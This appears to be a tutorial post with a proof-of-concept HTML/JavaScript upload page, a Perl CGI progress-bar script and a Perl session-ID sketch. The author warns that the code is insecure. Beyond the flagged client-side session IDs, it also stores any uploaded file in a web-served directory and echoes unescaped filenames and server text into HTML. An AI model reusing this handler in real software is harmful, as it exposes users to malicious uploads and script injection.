<legend>Upload Progress</legend>
<div id="trough">
<div id="bar" style="width: 0%"></div>
</div>
Received <span id="received">0</span>/<span id="total">0</span> (<span id="percent">0</span>%)
</fieldset>
</div>
<div id="upload-form" style="display: block; width: 600px; margin: auto">
<fieldset>
<legend>Upload a File</legend>
<form name="upload" method="post" action="upload.cgi" enctype="multipart/form-data" onSubmit="return startUpload()" id="theform">
<input type="hidden" name="do" value="upload">
<table border="0" cellspacing="0" cellpadding="2">
<tr>
<td align="left" valign="middle">
Session ID<span style="color: #FF0000">*</span>:
</td>
<td align="left" valign="middle">
<input type="text" size="40" name="sessid" id="sessid" readonly="readonly">
</td>
</tr>
<tr>
<td align="left" valign="middle">
File:
</td>
<td align="left" valign="middle">
<input type="file" name="incoming" size="40">
</td>
</tr>
</table><p>
<input type="submit" value="Upload It!"><p>
<small>
<span style="color: #FF0000">*</span> Randomly generated by JavaScript. In practice this would be
randomly generated by server-side script and "hard-coded" into the HTML you see on this page.
</small>
</form>
</fieldset>
</div>
<div id="debug"></div>
<script type="text/javascript">
// a jquery-like function, a shortcut to document.getElementById
function $(o) {
return document.getElementById(o);
}
// called on page load to make up a session ID (in real life the session ID
// would be made up via server-side script and "hard-coded" in the HTML received
// by the server, thus it wouldn't require javascript at all)
function init() {
// Make up a session ID.
var hex = [ "0", "1", "2", "3", "4", "5", "6", "7", "8", "9",
"A", "B", "C", "D", "E", "F" ];
var ses = "";
for (var i = 0; i < 8; i++) {
var rnd = Math.floor(Math.random()*16);
ses += hex[rnd];
}
$("sessid").value = ses;
// we set the form action to send the sessid in the query string, too.
// this way it's available inside the CGI hook function in a very easy
// way. In real life this would probably be done better.
$("theform").action += "?" + ses;
}
window.onload = init;
// This function is called when submitting the form.
function startUpload() {
// Hide the form.
$("upload-form").style.display = "none";
// Show the progress div.
$("progress-div").style.display = "block";
// Begin making ajax requests.
setTimeout("ping()", 1000);
// Allow the form to continue submitting.
return true;
}
// Make an ajax request to check up on the status of the upload
function ping() {
var ajax = new XMLHttpRequest();
ajax.onreadystatechange = function () {
if (ajax.readyState == 4) {
parse(ajax.responseText);
}
};
ajax.open("GET", "upload.cgi?do=ping&sessid=" + $("sessid").value + "&rand=" + Math.floor(Math.random()*99999), true);
ajax.send(null);
}
// React to the returned value of our ping test
function parse(txt) {
$("debug").innerHTML = "received from server: " + txt;
var parts = txt.split(":");
if (parts.length == 3) {
$("received").innerHTML = parts[0];
$("total").innerHTML = parts[1];
$("percent").innerHTML = parts[2];
$("bar").style.width = parts[2] + "%";
}
// Ping again!
setTimeout("ping()", 1000);
}
</script>
</body>
</html>
upload.cgi
#!/usr/bin/perl -w
use strict;
use warnings;
use CGI;
use CGI::Carp "fatalsToBrowser";
# Make a file upload hook.
my $q = CGI->new(\&hook);
# This is the file upload hook, where we can update our session
# file with the dirty details of how the upload is going.
sub hook {
my ($filename,$buffer,$bytes_read,$file) = @_;
# Get our sessid from the form submission.
my ($sessid) = $ENV{QUERY_STRING};
$sessid =~ s/[^A-F0-9]//g;
# Calculate the (rough estimation) of the file size. This isn't
# accurate because the CONTENT_LENGTH includes not only the file's
# contents, but also the length of all the other form fields as well,
# so it's bound to be at least a few bytes larger than the file size.
# This obviously doesn't work out well if you want progress bars on
# a per-file basis, if uploading many files. This proof-of-concept only
# supports a single file anyway.
my $length = $ENV{'CONTENT_LENGTH'};
my $percent = 0;
if ($length > 0) { # Don't divide by zero.
$percent = sprintf("%.1f",
(( $bytes_read / $length ) * 100)
);
}
# Write this data to the session file.
open (SES, ">$sessid.session") or die "Can't write session file: $!";
print SES "$bytes_read:$length:$percent";
close (SES);
}
# Now the meat of the CGI script.
print "Content-Type: text/html\n\n";
my $action = $q->param("do") || "unknown";
if ($action eq "upload") {
# They are first submitting the file. This code doesn't really run much
# until AFTER the file is completely uploaded.
my $filename = $q->param("incoming");
my $handle = $q->upload("incoming");
my $sessid = $q->param("sessid");
$sessid =~ s/[^A-F0-9]//g;
$filename =~ s/^.*[\\\/]//; # keep only the base file name; strip any client-supplied path
# Copy the file to its final location.
open (FILE, ">./files/$filename") or die "Can't create file: $!";
binmode(FILE); # uploads may be binary data
my $buffer;
while (read($handle,$buffer,2048)) {
print FILE $buffer;
}
close (FILE);
# Delete the session file.
unlink("./$sessid.session");
# Done.
print "Thank you for your file. <a href=\"files/$filename\">Here it is again.</a>";
}
elsif ($action eq "ping") {
# Checking up on the status of the upload.
my $sessid = $q->param("sessid");
$sessid =~ s/[^A-F0-9]//g;
# Exists?
if (-f "./$sessid.session") {
# Read it.
open (READ, "./$sessid.session");
my $data = <READ>;
close (READ);
print $data;
}
else {
print "0:0:0:error session $sessid doesn't exist";
}
}
else {
print "0:0:0:error invalid action $action";
}
You can download my full proof-of-concept test below:
Notice: this code is called "proof of concept"; it is NOT production-ready code. You should NOT download this if all you want is a complete plug-and-play solution you can quickly drop onto your web server. I wrote this code only to show how a working file upload progress bar is done in the simplest way possible; it's for developers who want to see how it works and will write their own production-ready uploader.
If you treat this as a plug-and-play solution anyway, I'm not your tech support. The code was never meant to be secure enough to let the general public upload files through it: the session IDs are made up client-side, for example, which is a bad idea in any real use case.
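For what it's worth, moving the session ID generation server-side is a small fix. Here's a sketch (it just produces an ID matching the [A-F0-9] filter upload.cgi applies; a real application should also check for collisions):

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Generate an 8-character uppercase hex session ID, the same
# format the JavaScript in upload.html makes up client-side.
sub make_sessid {
    my $id = '';
    $id .= sprintf("%X", int(rand(16))) for 1 .. 8;
    return $id;
}

print make_sessid(), "\n";
```

The server would embed this value into the hidden form field when rendering the page, instead of having JavaScript fill it in on load.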